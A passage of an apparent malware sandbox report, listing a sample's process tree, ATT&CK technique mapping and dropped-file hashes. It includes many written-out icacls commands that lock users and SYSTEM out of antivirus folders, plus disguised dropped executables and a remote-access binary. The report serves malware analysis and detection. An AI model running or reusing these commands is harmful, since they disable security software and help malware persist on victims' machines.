                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
                                                                                                                                            2⤵
                                                                                                                                              PID:3592
                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
                                                                                                                                                3⤵
                                                                                                                                                • Modifies file permissions
                                                                                                                                                PID:1384
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
                                                                                                                                              2⤵
                                                                                                                                                PID:1836
                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                  icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
                                                                                                                                                  3⤵
                                                                                                                                                  • Modifies file permissions
                                                                                                                                                  PID:3492
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
                                                                                                                                                2⤵
                                                                                                                                                  PID:1000
                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                    icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
                                                                                                                                                    3⤵
                                                                                                                                                    • Modifies file permissions
                                                                                                                                                    PID:3636
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
                                                                                                                                                  2⤵
                                                                                                                                                    PID:936
                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                      icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
                                                                                                                                                      3⤵
                                                                                                                                                      • Modifies file permissions
                                                                                                                                                      PID:888
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
                                                                                                                                                    2⤵
                                                                                                                                                      PID:2692
                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                        icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
                                                                                                                                                        3⤵
                                                                                                                                                        • Modifies file permissions
                                                                                                                                                        PID:1776
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
                                                                                                                                                      2⤵
                                                                                                                                                        PID:1052
                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                          icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
                                                                                                                                                          3⤵
                                                                                                                                                          • Modifies file permissions
                                                                                                                                                          PID:680
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
                                                                                                                                                        2⤵
                                                                                                                                                          PID:360
                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                            icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
                                                                                                                                                            3⤵
                                                                                                                                                            • Modifies file permissions
                                                                                                                                                            PID:2208
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
                                                                                                                                                          2⤵
                                                                                                                                                            PID:1192
                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                              icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
                                                                                                                                                              3⤵
                                                                                                                                                              • Modifies file permissions
                                                                                                                                                              PID:2916
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
                                                                                                                                                            2⤵
                                                                                                                                                              PID:3256
                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                3⤵
                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                PID:584
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
                                                                                                                                                              2⤵
                                                                                                                                                                PID:1072
                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                  icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                  PID:2120
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:788
                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                    icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                    PID:1652
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:2128
                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                      icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                      PID:2088
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:3304
                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                        icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                        PID:3620
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:968
                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                          icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                          PID:2852
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:504
                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                            icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                            PID:4016
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:3988
                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                              icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                              PID:1220
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:3764
                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                3⤵
                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                PID:2844
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:1920
                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                  icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                  PID:1268
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:1776
                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                    icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                    PID:3852
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:2084
                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                      icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                      PID:2076
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:2208
                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                        icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                        PID:4092
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:1360
                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                          icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                          PID:1128
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:804
                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                            icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                            3⤵
                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                            PID:1944
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:1072
                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                              icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                              PID:700
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:2168
                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                PID:2520
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:3612
                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                  icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                  PID:2852
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:2892
                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                    icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                    PID:2824
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:356
                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                      icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                      PID:416
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:1460
                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                        icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                        PID:1400
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:680
                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                          icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                          PID:1096
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:3256
                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                            icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                            PID:3052
                                                                                                                                                                                                      • C:\ProgramData\Windows\rutserv.exe
                                                                                                                                                                                                        C:\ProgramData\Windows\rutserv.exe
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                        PID:3152
                                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:3988

                                                                                                                                                                                                        Network

                                                                                                                                                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                        Execution

                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1053

                                                                                                                                                                                                        Command-Line Interface

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1059

                                                                                                                                                                                                        Persistence

                                                                                                                                                                                                        Modify Existing Service

                                                                                                                                                                                                        3
                                                                                                                                                                                                        T1031

                                                                                                                                                                                                        Hidden Files and Directories

                                                                                                                                                                                                        2
                                                                                                                                                                                                        T1158

                                                                                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1060

                                                                                                                                                                                                        Winlogon Helper DLL

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1004

                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1053

                                                                                                                                                                                                        Privilege Escalation

                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1053

                                                                                                                                                                                                        Defense Evasion

                                                                                                                                                                                                        Modify Registry

                                                                                                                                                                                                        5
                                                                                                                                                                                                        T1112

                                                                                                                                                                                                        Disabling Security Tools

                                                                                                                                                                                                        2
                                                                                                                                                                                                        T1089

                                                                                                                                                                                                        Hidden Files and Directories

                                                                                                                                                                                                        2
                                                                                                                                                                                                        T1158

                                                                                                                                                                                                        Impair Defenses

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1562

                                                                                                                                                                                                        File Permissions Modification

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1222

                                                                                                                                                                                                        Discovery

                                                                                                                                                                                                        System Information Discovery

                                                                                                                                                                                                        3
                                                                                                                                                                                                        T1082

                                                                                                                                                                                                        Query Registry

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1012

                                                                                                                                                                                                        Command and Control

                                                                                                                                                                                                        Web Service

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1102

                                                                                                                                                                                                        Impact

                                                                                                                                                                                                        Service Stop

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1489

                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                        • C:\Program Files\Common Files\System\iediagcmd.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                                        • C:\ProgramData\Microsoft\Check\Check.txt
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                                        • C:\ProgramData\Microsoft\Intel\R8.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          ad95d98c04a3c080df33ed75ad38870f

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          abbb43f7b7c86d7917d4582e47245a40ca3f33c0

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          40d4931bbb3234a2e399e2e3e0dcfe4b7b05362c58d549569f2888d5b210ebbd

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          964e93aeec90ce5ddaf0f6440afb3ed27523dfcddcdfd4574b62ef32763cb9e167691b33bfc2e7b62a98ff8df2070bf7ae53dafc93a52ed6cbe9c2ca1563c5ed

                                                                                                                                                                                                        • C:\ProgramData\Microsoft\Intel\R8.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          ad95d98c04a3c080df33ed75ad38870f

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          abbb43f7b7c86d7917d4582e47245a40ca3f33c0

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          40d4931bbb3234a2e399e2e3e0dcfe4b7b05362c58d549569f2888d5b210ebbd

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          964e93aeec90ce5ddaf0f6440afb3ed27523dfcddcdfd4574b62ef32763cb9e167691b33bfc2e7b62a98ff8df2070bf7ae53dafc93a52ed6cbe9c2ca1563c5ed

                                                                                                                                                                                                        • C:\ProgramData\Microsoft\Intel\taskhost.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          23d51bd68920fdfd90809197b8c364ff

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          5eee02db6087702db49acb2619e37d74833321d9

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          0e45de428064f864f467f000be38db66ee55d22ddc259d86a5f6a038088cabd1

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          3159ccf3c21490e8841dcf950a3fc7359c3ff11a8db851f0b288a070ada4ba682c102668c8d1e922ea046f49cce819ba9bb9e90317e6f3fea1fa7a1799faf9d7

                                                                                                                                                                                                        • C:\ProgramData\Microsoft\Intel\taskhost.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          23d51bd68920fdfd90809197b8c364ff

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          5eee02db6087702db49acb2619e37d74833321d9

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          0e45de428064f864f467f000be38db66ee55d22ddc259d86a5f6a038088cabd1

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          3159ccf3c21490e8841dcf950a3fc7359c3ff11a8db851f0b288a070ada4ba682c102668c8d1e922ea046f49cce819ba9bb9e90317e6f3fea1fa7a1799faf9d7

                                                                                                                                                                                                        • C:\ProgramData\Microsoft\Intel\wini.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          204d1fc66f62b26d0b5e00b092992d7d

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          e9a179cb62d7fddf9d4345d76673c49c88f05536

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          69c6fb12071b3672e14c9187b3a9e9b9f59437f2fc3ffb1b2f7cc7f78b97455b

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          cdb03b747a120872b984242a9e7d0ee9cc1b89f0d0fcc503a0d8d79b3f73f88acc5532f3bb42ee4cddb054b791baa672e5cf5fea74acda6b6c686768e1152a4f

                                                                                                                                                                                                        • C:\ProgramData\Microsoft\Intel\wini.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          204d1fc66f62b26d0b5e00b092992d7d

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          e9a179cb62d7fddf9d4345d76673c49c88f05536

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          69c6fb12071b3672e14c9187b3a9e9b9f59437f2fc3ffb1b2f7cc7f78b97455b

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          cdb03b747a120872b984242a9e7d0ee9cc1b89f0d0fcc503a0d8d79b3f73f88acc5532f3bb42ee4cddb054b791baa672e5cf5fea74acda6b6c686768e1152a4f

                                                                                                                                                                                                        • C:\ProgramData\RealtekHD\taskhost.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          676f368fed801fb2a5350f3bdc631d0b

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          e129c24447d7986fb0ed1725b240c00d4d9489ea

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          5c4eaa5bce7f19f29013685899d8205245f4a5a7728e770458619510e661b145

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          d4a3fb68eea4bcad55657a17ff8474d220e6e6cd113cb42d4d00a698e59941b1dab33bb626901fedeb312dee0c0a0559f9e4a75761028eab69a686c61e81160d

                                                                                                                                                                                                        • C:\ProgramData\RealtekHD\taskhost.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          676f368fed801fb2a5350f3bdc631d0b

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          e129c24447d7986fb0ed1725b240c00d4d9489ea

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          5c4eaa5bce7f19f29013685899d8205245f4a5a7728e770458619510e661b145

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          d4a3fb68eea4bcad55657a17ff8474d220e6e6cd113cb42d4d00a698e59941b1dab33bb626901fedeb312dee0c0a0559f9e4a75761028eab69a686c61e81160d

                                                                                                                                                                                                        • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          21feb5dccba8bf69df9a2307d206d033

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          65fc243a3530225903bf422f19ffd0e3aad66f03

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          ff0140dbaa83c7f64b2e86f43cb5f54584b31b371b6c984d8b214fe35eb8e493

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          b5a25a95cf6d9dcac0de27f253f66cbba76029d6cb9311f41f351d7bb9d556d93023e04e922b42ebd0e47e68e84d2d8c50a37d9c2380524b22d9066079dedaca

                                                                                                                                                                                                        • C:\ProgramData\WindowsTask\MicrosoftHost.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          191f67bf26f68cef47359b43facfa089

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          94529e37aa179e44e22e9ccd6ee0de8a49a8f2fc

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          2144c0d5d80613e66c393271c11c374afc57ae910d455bed661bb5cb04c1d2c5

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          7d8de83158acf23b8a3fda50106e36f59c3888c99e45b8fa46599c45f6e80e3b6e4cdcbbf440f442446a93933685e086925338320716d3919a9033118425102b

                                                                                                                                                                                                        • C:\ProgramData\WindowsTask\MicrosoftHost.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          191f67bf26f68cef47359b43facfa089

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          94529e37aa179e44e22e9ccd6ee0de8a49a8f2fc

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          2144c0d5d80613e66c393271c11c374afc57ae910d455bed661bb5cb04c1d2c5

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          7d8de83158acf23b8a3fda50106e36f59c3888c99e45b8fa46599c45f6e80e3b6e4cdcbbf440f442446a93933685e086925338320716d3919a9033118425102b

                                                                                                                                                                                                        • C:\ProgramData\WindowsTask\winlogon.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          ec0f9398d8017767f86a4d0e74225506

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484

                                                                                                                                                                                                        • C:\ProgramData\Windows\install.vbs
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          5e36713ab310d29f2bdd1c93f2f0cad2

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          7e768cca6bce132e4e9132e8a00a1786e6351178

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          cd8df8b0c43c36aabb0a960e4444b000a04eb513f0b34e12dbfd098944e40931

                                                                                                                                                                                                          SHA512

